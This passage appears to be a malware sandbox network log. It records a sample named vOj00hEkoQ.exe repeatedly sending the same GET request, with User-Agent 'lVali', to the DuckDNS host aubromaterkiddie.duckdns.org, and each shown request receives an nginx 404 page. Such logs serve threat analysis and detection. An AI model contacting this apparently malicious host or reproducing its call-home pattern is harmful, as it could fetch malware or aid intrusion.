                2022-08-05 10:12:07 UTC45INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                108192.168.2.649905208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:08 UTC45OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:08 UTC45INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:08 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:08 UTC45INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                109192.168.2.649907208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:08 UTC46OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:08 UTC46INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:08 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:08 UTC46INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.649774208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:37 UTC4OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:37 UTC4INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:37 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:37 UTC4INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                110192.168.2.649908208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:08 UTC46OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:08 UTC46INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:08 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:08 UTC46INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                111192.168.2.649909208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:08 UTC46OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:08 UTC47INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:08 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:08 UTC47INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                112192.168.2.649910208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:09 UTC47OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:09 UTC47INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:09 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:09 UTC47INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                113192.168.2.649911208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:09 UTC47OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:09 UTC47INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:09 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:09 UTC48INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                114192.168.2.649912208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:09 UTC48OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:09 UTC48INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:09 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:09 UTC48INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                115192.168.2.649913208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:09 UTC48OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:09 UTC48INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:09 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:09 UTC48INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                116192.168.2.649914208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:10 UTC49OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:10 UTC49INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:10 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:10 UTC49INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                117192.168.2.649915208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:10 UTC49OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:10 UTC49INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:10 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:10 UTC49INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                118192.168.2.649916208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:10 UTC49OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:10 UTC50INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:10 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:10 UTC50INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                119192.168.2.649917208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:10 UTC50OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:10 UTC50INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:10 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:10 UTC50INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.649775208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:38 UTC5OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:38 UTC5INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:38 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:38 UTC5INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                120192.168.2.649918208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:11 UTC50OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:11 UTC50INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:11 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:11 UTC51INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                121192.168.2.649919208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:11 UTC51OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:11 UTC51INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:11 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:11 UTC51INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                122192.168.2.649920208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:11 UTC51OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:11 UTC51INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:11 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:11 UTC51INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                123192.168.2.649921208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:11 UTC52OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:12 UTC52INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:11 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:12 UTC52INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                124192.168.2.649922208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:12 UTC52OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:12 UTC52INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:12 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:12 UTC52INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                125192.168.2.649923208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:12 UTC52OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
